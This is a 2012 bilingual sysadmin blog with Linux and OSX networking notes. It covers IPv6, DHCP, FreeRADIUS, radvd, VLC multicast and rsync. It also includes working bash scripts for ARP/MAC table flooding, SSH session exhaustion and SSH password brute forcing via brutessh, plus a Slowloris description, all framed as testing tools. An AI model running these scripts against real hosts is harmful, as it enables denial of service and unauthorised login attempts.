Wednesday, December 19, 2012

Linux有Terminator，OSX呢？

Terminator在Linux上可說是神兵利器，絕對是工程師的最愛，那麼OSX呢? 唉，原生的終端機真的是跟不上時代...... 好在有iTerm2可以用，真是棒呀！現在我只能說13"的MBP螢幕有點小。:p

Wednesday, December 12, 2012

Disable IPv6 in Mac OSX 10.7

如下圖在OSX10.7裡面的網路設定，針對IPv6並沒有關閉的選項，搜尋了一下可以用command暫時將它關閉起來。

For Ethernet:

networksetup -setv6off Ethernet

For Wireless:

networksetup -setv6off Wi-Fi

Wednesday, November 07, 2012

Bonjour browser on OSX

You can use mDNS or Bonjour browser to query DNS-SD on OSX as following:

Browser service:

mDNS -B (Browse for services instances)
MBP:~ lawrence$ mDNS -B _sftp-ssh._tcp.
Browsing for _sftp-ssh._tcp.
Talking to DNS SD Daemon at Mach port 5891
Timestamp A/R Flags Domain Service Type Instance Name
12:18:11.060 Add 0 local. _sftp-ssh._tcp. MBP

Look up a service:

mDNS -L (Look up a service instance)
MBP:~ lawrence$ mDNS -L "MBP" _sftp-ssh._tcp. .
Lookup MBP._sftp-ssh._tcp.local
Talking to DNS SD Daemon at Mach port 5891
12:18:54.882 Service can be reached at 10.10.2.7 :22
12:18:54.882 FE80:0000:0000:0000:3E07:54FF:FE35:5093%en0:22
12:18:54.883 3001:0288:0000:0000:3E07:54FF:FE35:5093%en0:22

Bonjour browser:

References:

http://en.wikipedia.org/wiki/Multicast_DNS

Bonjour browser
How to reset the DNS cache on OSX

Bonjour browser for Windows and Android

mDNS repeater

Thursday, October 18, 2012

DHCP Server某網段的IP range被用完了該怎麼辦？

做實驗時不小心把某個網段的IP scope用完了，距離release時間有一天，影響到新的client拿不到IP了，靈機一動就想把它手動砍掉吧！不過我要對付的是整個IP scope，嘿嘿～派出sed一行指令就結束了。

Steps:

1. dhcpd的lease table是放在/var/lib/dhcpd/dhcpd.leases

2. 檢查一下格式:

lease 10.10.6.125 {
starts 2 2012/10/16 22:12:53;
ends 3 2012/10/17 22:12:53;
tstp 3 2012/10/17 22:12:53;
binding state active;
next binding state free;
hardware ethernet b8:ac:6f:21:53:ec;
uid "\001\270\254o!S\354";
client-hostname "D129252S";
}

10.10.6這個range被fake DHCP client用完了，所以我要把它們手動通通砍掉。

3. Sed:

sed -i "/10.10.6/,/}/d" /var/lib/dhcpd/dhcpd.leases

4. 重啟DHCP Server:

# /etc/init.d/dhcpd restart

參考: http://en.kioskea.net/faq/1451-sed-delete-one-or-more-lines-from-a-file

Saturday, October 06, 2012

Install Monitorix on CentOS

Monitorix是一套free, open的套件能幫助系統管理者觀察主機的各種狀況，比如網路的流量，磁碟的使用率與服務的負載等等。安裝與配置的方法則是出乎意料的簡單。

Step1. Installation:

# yum install httpd rrdtool rrdtool-perl perl-libwww-perl perl-MailTools perl-MIME-Lite perl-CGI perl-DBI perl-XML-Simple

# rpm -ivh http://www.monitorix.org/monitorix-n.n.n-1.noarch.rpm
(where n.n.n is the latest version,2.6.0 for example)

Step2. Configuration:

Configure file is in /etc/monitorix.conf
Apache configure file is in /etc/httpd/conf.d/monitorix.conf, and you need to configure it allow connect to Monitorix from any where.

Step3. Restart service:

# /etc/init.d/monitorix start && chkconfig monitorix on
# /etc/init.d/httpd restart && chkconfig httpd on

Step4. Access:
http://X.X.X.X/monitorix/
(Where X.X.X.X is your IP address)

Saturday, September 15, 2012

升級OpenSUSE12.2

剛剛把OpenSUSE12.1升級到了12.2，先來說說第1印象吧。

改用了Systemd取代Sys V，所以感覺上開機變更快了。
字型變更漂亮。
DeadBeef運作良好，不受升級影響。
aMule運作良好，不受升級影響。
Terminator運作良好，不受升級影響。

問題：

音效輸出不會自動切換，比如當插入耳機後，喇叭還是有輸出。
Google-Chrome需要重新安裝。
PPS不能播放，可能需要重新安裝。
Tools bar看不到目前的輸入法。
無法針對RAR檔案解壓縮。

剛升級完，繼續測試中。

How to upgrade?

Friday, September 14, 2012

How to be a Multicast Video stream Server in Linux

透過VLC這套軟體，可以在Linux建立支援multicast的媒體串流播放器，以下簡單的記錄IPv4與IPv6的建立與播放的方法：

1. IPv4:
- 切換至non-root user.
- 開啟console.
- 執行以下的命令：
vlc -vvv 111755131.mov -L --sout '#duplicate{dst=rtp{mux=ts,dst=239.1.1.1,port=5004,sdp=sap://,name="TestStream"}}'

111755131.mov 是欲播放的檔案。
239.1.1.1 with port 5004 是multicast的IPv4 address與port number.

2. IPv6:
步驟跟IPv4都一樣，只是將IP改成v6的格式如下:
vlc -vvv 111755131.mov -L --sout '#duplicate{dst=rtp{mux=ts,dst=[ff08::114],port=5004,sdp=sap://,name="TestStream"}}'

VLC Client:
- IGMP v2: Media::Open Network Stream:: rtp://@239.1.1.1:5004

- IGMP v3: Media::Open Network Stream:: rtp://10.10.10.10@239.1.1.1:5004

- MLD: Media::Open Network Stream:: rtp://@[ff08::114]:5004

Set IGMP version in Windows

Latency when displaying a live RTP stream

Wednesday, September 05, 2012

帽客的愛車 VW Tiguan

Tiguan結合了Tiger與Lguana -> OSX+OpenSUSE? 所以我對它情有獨鍾 :) 別來亂了，這台車是我老婆選的。但是它真的是台好車唷！

OpenSUSE 12.2正式發行！

OpenSUSE 12.2已經可以開始下載囉！以下是這一版本的release note.

OpenSUSE 12.2 發行公告

Sunday, September 02, 2012

還有三天！OpenSUSE12.2要來囉！

緊接著Fedora17，還剩三天OpenSUSE 12.2就要釋出囉！話說我也好久沒有更新我的Blog了.......唉唉唉～

Tuesday, May 29, 2012

Free memory on Mac OSX

公司的MacBookPro很少重新開機，想當然耳系統日以繼夜的運行，當開啟新的APP時，會覺得有點卡卡的，以往習慣用MemoryFree2這套APP去清理"inactive"的memory，但是其實用一個command就可以達成了，實作如下：

MBP:~ lawrence$ sync && purge

搞定，收工。

Monday, May 07, 2012

How to configure FreeRADIUS2.x support EAP-TLS under Linux?

延續上篇How to configure FreeRADIUS2.x support EAP-TTLS under Linux?
現在只要再產生client端要使用的certificate並且把ROOTCA與ClientCA匯入到client端，就可以使用EAP-TLS了，整個步驟如下:

Step1: MAKING A CLIENT CERTIFICATE

Client certificates are used by EAP-TLS, and optionally by EAP-TTLS
and PEAP. The following steps outline how to create a client
certificate that is signed by the server certificate created above.
You will have to have the password for the server certificate in the
"input_password" and "output_password" fields of the server.cnf file.

$ vi client.cnf
Edit the "input_password" and "output_password" fields to be the
password for the client certificate. You will have to give these
passwords to the end user who will be using the certificates.
Edit the [client] section to have the correct values for your
country, state, etc. Be sure that the commonName field here is
the User-Name that will be used for logins!
$ make client.pem
The users certificate will be in "emailAddress.pem",
i.e. "user@example.com.pem".
To create another client certificate, just repeat the steps for
making a client certificate, being sure to enter a different login
name for "commonName", and a different password.

Step2: IMPORT ROOTCA, and Client Certificate/以Fedora16為例:

- 安全性: WPA&WPA2 Enterprise
- 驗證: TLS
- 識別: commonName
- CA: ca.pem
- 私密金鑰: client.p12
- 私密金鑰密碼: "input_password" and "output_password"

Note: ca.pem and client.p12是產生ROOTCA與Client Certificate時所一併產生的，所在的目錄是/etc/raddb/certs/

That's all.

Friday, April 27, 2012

How to configure IPv6 Router advertisement Daemon under Linux?

在此簡單記錄一下如何在Redhat/Fedora下透過Router advertisement Daemon(radvd)自動分派IPv6的IP address.

Step1: 設定Kernel參數 for IPv6 support

net.ipv6.conf.all.forwarding = 1
net.ipv6.conf.all.autoconf = 0

Step2: 設定系統支援IPv6

# vi /etc/sysconfig/network
......
NETWORKING_IPV6=yes
......

Step3: 安裝radvd

# yum install radvd

Step4: 設定radvd.conf

# vi /etc/radvd.conf
interface eth1
{
AdvSendAdvert on;
MinRtrAdvInterval 30;
MaxRtrAdvInterval 100;
AdvOtherConfigFlag on;
prefix 3001:288::/64
{
AdvOnLink on;
AdvAutonomous on;
AdvRouterAddr on;
};
};

Step5: 啟動radvd

# /etc/init.d/radvd start; chkconfig radvd on

Thursday, April 26, 2012

How to configure FreeRADIUS2.x support EAP-TTLS under Linux?

If you would like to make FreeRADIUS 2.x support EAP-TTLS, then following steps outline how to configure it:

1. Re-generate Root CA/Server certificate:

# cd /etc/raddb/certs
# rm -f ca.der ca.key ca.pem
# rm -f server.crt server.csr server.key server.p12 server.pem

2. Make Root CA:

# vi ca.cnf
Edit the "input_password" and "output_password" fields to be the
password for the CA certificate.
Edit the [certificate_authority] section to have the correct values
for your country, state, etc.
# make ca.pem
This step creates the CA certificate.
# make ca.der
This step creates the DER format of the self-signed certificate,
which is can be imported into Windows.

3. MAKING A SERVER CA:

# vi server.cnf
Edit the "input_password" and "output_password" fields to be the
password for the server certificate.
Edit the [server] section to have the correct values for your
country, state, etc. Be sure that the commonName field here is
different from the commonName for the CA certificate.
# make server.pem
This step creates the server certificate.
If you have an existing certificate authority, and wish to create a
certificate signing request for the server certificate, edit
server.cnf as above, and type the following command.
# make server.csr
You will have to ensure that the certificate contains the XP
extensions needed by Microsoft clients.

4. To modify client configuration directives in /etc/raddb/clients.conf

client 10.10.0.0/16 {
secret = testing123
shortname = private-network-2
}

5. To modify EAP type in /etc/raddb/eap.conf

default_eap_type = ttls
....
ttls {
default_eap_type = mschapv2
copy_request_to_tunnel = yes
use_tunneled_reply = yes
#virtual_server = "inner-tunnel"
}
....

6. To add user in /etc/raddb/users

lawrence Cleartext-Password := "testing"

7. To disable MPPE in /etc/raddb/modules/mschap

use_mppe = no

8. Restart FreeRADIUS:

# /etc/init.d/radiusd restart

That's all.

Tuesday, April 24, 2012

How to configure DHCP Server prefer broadcast response all the time under Linux?

上篇Configure Windows7 prefer DHCP unicast or broadcast response，說明了可更改OS的設定，然而有一種情況是DHCP Server說了算！也就是說DHCP Server可以不管DHCP client原本的預期，而一律採用broadcast的方式回應，在dhcpd中，只要加一筆參數就可以了。

# vi /etc/dhcpd.conf
.....

always-broadcast on;

......

修改後，記得restart dhcpd。

# /etc/init.d/dhcpd restart

BTW, Windows7預設prefer broadcast response，WindowsXP則是unicast response，而一般的linux distro.同樣也是unicast。

How to send Gratuitous ARP request/reply via arping under Linux

What's Gratuitous ARP:
http://wiki.wireshark.org/Gratuitous_ARP

How?
1. GARP request:

# arping -U 10.10.10.100 -I eth0
-U : Unsolicited ARP mode, update your neighbours
-I device : which ethernet device to use (eth0)

2. GARP reply:

# arping -A -U 10.10.10.100 -I eth0
-A : ARP answer mode, update your neighbours

Thursday, March 22, 2012

Virtual file system in Linux

如果你想要在Linux系統中從一個既有的partition去虛擬另一個partition的話，Virtual file system是一個蠻不錯的小技巧。

Step1. 建立一個空檔:

[root@localhost ruckus]# cd /tmp/
[root@localhost tmp]# dd if=/dev/zero of=vs_file bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied，0.767225 秒，700 MB/s

Step2. 將空檔格式化成虛擬的檔案系統:

[root@localhost tmp]# mke2fs -j vs_file
mke2fs 1.39 (29-May-2006)
vs_file is not a block special device.
Proceed anyway? (y,n) y
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
131072 inodes, 524288 blocks
26214 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67633152
64 block groups
8192 blocks per group, 8192 fragments per group
2048 inodes per group
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729, 204801, 221185, 401409

Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 21 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.

Step3. 以一般掛載partition的方法掛載虛擬檔案系統:

[root@localhost tmp]# mount -o loop /tmp/vs_file /mnt/vf/

Step4. 驗證一下:

[root@localhost tmp]# mount | grep vs_file
/tmp/vs_file on /mnt/vf type ext3 (rw,loop=/dev/loop0)
[root@localhost tmp]# cd /mnt/vf/
[root@localhost vf]# ls
lost+found
[root@localhost vf]# touch test
[root@localhost vf]# ls
lost+found test

GNU Hurd kernel

孤陋寡聞，原來GNU原先預期搭載的kernel不是用Linux而是Hurd。

http://www.gnu.org/software/hurd/index.html

http://zh.wikipedia.org/wiki/Hurd

http://www.osnews.com/story/25724/Interview_Richard_Stallman

Monday, March 19, 2012

Configure Windows7 prefer DHCP unicast or broadcast response

預設上Windows7 Home edition是prefer DHCP Server回應的封包採用broadcast的方式，當然這也是可以更改為unicast的，做法很簡單，只要透過register table來更改就可以完成了。

Click Start->regedit->

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}

GUID這邊指的是對應到的NIC，可用wireshark來幫助查詢。
DhcpConnForceBroadcastFlag (0 or 1)
0 indicate unicast
1 indicate broadcast

Reference:

DHCP Broadcast flag handling in Windows 7

Wednesday, March 07, 2012

Low bandwidth HTTP attack: Slowloris

Low bandwidth HTTP attack與傳統的DoS反其道而行，採取的方法是用單一的機器只需少少的頻寬就可以讓HTTP Server癱瘓，其中最著名的就是Slowloris，他的原理簡單的來說是對HTTP Server送不出完全的HTTP request，並且試著讓它保持不被HTTP Server timeout，如此一來HTTP Server可開啟的最大socket數就會滿了，最後導致HTTP Server無法提供服務給其他機器。

Slowloris下載處

請勿以此工具攻擊別人，謝謝。

參考來源：

http://ha.ckers.org/slowloris/

http://news.softpedia.com/news/Web-Servers-in-Danger-from-Low-Bandwidth-HTTP-DoS-114745.shtml

http://en.wikipedia.org/wiki/Slowloris

ARP/MAC address flooding attack

在BT5結合arping測試工具，寫了一個簡單的script來測試目標主機可否hold得住ARP/MAC address flooding attack，script內容如下：

root@bt:~# cat bin/arp_cache.sh

#!/bin/bash

function arp_cache_attack
{
while true;
do
for((i=1;i<=100;i++))
do
mac=$(($RANDOM%10))
number1=$(($RANDOM%254))
number2=$(($RANDOM%254))
number3=$(($RANDOM%254))
number4=$(($RANDOM%254))
arping -S "$number1.$number2.$number3.$number4" -s 00:00:00:00:$mac:$mac 10.10.6.6 -c 1 &
done
sleep 1
kill `ps aux | grep -i arping | grep -v grep | awk -F" " '{ print $2 }'` 1>/dev/null
sync && echo "3" > /proc/sys/vm/drop_caches
echo "re-generate"
done
}

arp_cache_attack

此script每次會產生100筆隨機的假IP與MAC address去嘗試塞滿目標主機(10.10.6.6於以上script中)的arp table。

僅供個人研究，請勿以此script測試或攻擊別人的主機。

Friday, February 24, 2012

如何增加Linux arp cache entry

好文章，先收藏起來。

Linux: Neighbour Table Overflow Error and Solution

Thursday, February 16, 2012

OSX 10.8 Mountain Lion~

你能相信嗎？OSX 10.8要發佈了！Lion真是史上最短的OSX。

http://www.apple.com/macosx/mountain-lion/

如何測試SSH Server可接受的未經授權的最大連線數?

寫了一個簡單的script如下，去做測試然而目前只支援Class C，可以改善的空間應該還不少。

#!/bin/bash

# Bind IP
read -p "Which interface? [eth0]: " INTERFACE
read -p "Net address: [10.10.10] " NETIP
read -p "Min IP address: [1] " MiIP
read -p "Max IP address:[254] " MaIP

for((i="$MiIP";i<="$MaIP";i++))
do
ip addr add "$NETIP"."$i"/24 dev $INTERFACE 1>/dev/null 2>1
done
echo ""

# Start to test
read -p "Target: [10.10.10.10] " TARGET
i=$MiIP
num=1

echo ""
echo "Preparing for test target: $TARGET"
sleep 5

while true;
do
ssh admin@$TARGET -o StrictHostKeyChecking=no -b "$NETIP"."$i" 1>/dev/null 2>1 &
sleep 1
netstat -an | grep 22 | grep ESTABLISHED | grep "\<$NETIP"."$i\>"
if [ `echo $?` -ne 0 ]; then
num=$(($num-1))
echo "The maximum SSH session of $TARGET is $num"
kill `ps aux | grep "\<22\>" | grep -v grep | grep -v ssh-agent | awk -F" " '{print $2}'` > /dev/null
break
else
echo "SSH session number $num is established!"
i=$(($i+1))
num=$(($num+1))
fi
done

exit

Wednesday, February 15, 2012

SSH Brute Force attack tools

Here it is: http://zeldor.biz/2011/01/how-to-bruteforce-ssh/

And I'v wrote a bash script to make it more easy to use as following:

1 #!/bin/bash
2
3 read -p "Please enter your target host: " HOST
4 echo "Enter run to launch SSH Brute Force Attack, or exit to leave it."
5
6 echo -n "[run/exit]? "
7 while read LINE;
8 do
9 if [ $LINE = "run" ]; then
10 clear
11 python /root/bin/brutessh/brutessh.py -h $HOST -u admin -d /root/bin/brutessh/passlist.txt &
12 sleep 10
13 echo -n "***** Enter exit can stop SSH Brute Force attack immediately or rerun it again. ***** [run/exit]? "
14 continue
15 elif [ $LINE = "exit" ]; then
16 kill `ps aux | grep brutessh.py | grep -v grep |awk -F" " '{ print $2 }'` 2> /dev/null
17 break
18 fi
19 done

Please to adjust /root/bin/brutessh/ above to work with your environment.

Thanks to Igor Drobot (http://zeldor.biz/about/ blog author) and laramies (brutessh author).

將/var/www/html自動從HostA同步到HostB。

HostA: 10.10.2.126 (source)

HostB: 10.10.2.128 (destination)

Step:

1. 設定HostA(Destination)：

1.1 確定有安裝rsync:

[root@server1 ~]# rpm -qa | grep -i rsync
rsync-3.0.6-5.el6_0.1.i686

1.2 編輯/etc/xinetd.d/rsync：

service rsync
{
disable = no
flags = IPv6
socket_type = stream
wait = no
user = root
server = /usr/bin/rsync
server_args = --daemon
log_on_failure += USERID
}

1.3 建立/etc/rsyncd.conf：

# any name you like
[test]
# destination directory
path = /home/backup
# Hosts you allow to copy (specify source Host)
hosts allow = 10.10.2.126
hosts deny = *
list = true
uid = root
gid = root
read only = false

1.4 重新啟動xinetd

[root@server1 ~]# /etc/init.d/xinetd restart
正在停止 xinetd： [ 確定 ]
正在啟動 xinetd： [ 確定 ]

2. 設定HostB(Source)：

2.1 確定有安裝rsync:

[root@server1 ~]# rpm -qa | grep rsync
rsync-3.0.6-4.el5_7.1

2.2 執行rsync將檔案同步：

[root@server1 ~]# rsync -avz --delete /var/www/html/ 10.10.2.128::test
sending incremental file list
./
proxy.pac
proxy.pac.ipv4
proxy.pac.ipv6
wpad.dat -> proxy.pac
ssl/
ssl/index.hrml

sent 3089 bytes received 174 bytes 6526.00 bytes/sec
total size is 5039 speedup is 1.54